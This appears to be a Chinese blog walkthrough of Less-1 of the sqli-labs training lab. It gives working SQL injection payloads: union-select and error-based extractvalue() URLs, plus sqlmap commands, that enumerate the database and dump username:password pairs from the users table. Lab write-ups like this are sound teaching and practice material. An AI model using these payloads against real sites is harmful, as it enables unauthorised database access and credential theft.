第一关:

方法一:
在id=1后面加一个单引号后发现报错

sqli-labs通关WriteUp-D-R0s1博客

然后把这个单引号注释掉试一下

sqli-labs通关WriteUp-D-R0s1博客
使用'or 1=1--+

order by 查列数
页面显示正常了。存在注入,先查一下列数
http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+
使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order by 进行排序,语句如上,当使用order by 3的时候正常,使用order by 4的时候报错,就说明这里有三列数据

查完列数后,注意后面 id=非正确值

union select看返回值
构造payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3--+
发现2,3存在回显

暴库payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()--+

sqli-labs通关WriteUp-D-R0s1博客
数据库名字:security

爆表payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

sqli-labs通关WriteUp-D-R0s1博客
爆出的表名,其中users最可疑

爆字段payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

sqli-labs通关WriteUp-D-R0s1博客

user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password 这些都是users表中的字段名

爆值payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(username,0x3a,password)%20from%20users--+
payload解释:
0x3a:0x是十六进制的标志,3a是十进制的58,是ascii中的':',用以分割password和username

sqli-labs通关WriteUp-D-R0s1博客

方法二:
手工报错型注入

检测报错型payload:

1. ?id=1' 1=1--+   正常
2. ?id=1' 1=2--+   报错
证明确实存在手工报错型注入漏洞

注意:id=正确值

报错注入:

当前表:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

字段:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+

值:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+

同样使用not in显示其他值

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+

使用sqlmap:

爆表:
sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch -v 0

sqli-labs通关WriteUp-D-R0s1博客

爆字段:
sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch -v 0

sqli-labs通关WriteUp-D-R0s1博客

值:
sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch -v 0

sqli-labs通关WriteUp-D-R0s1博客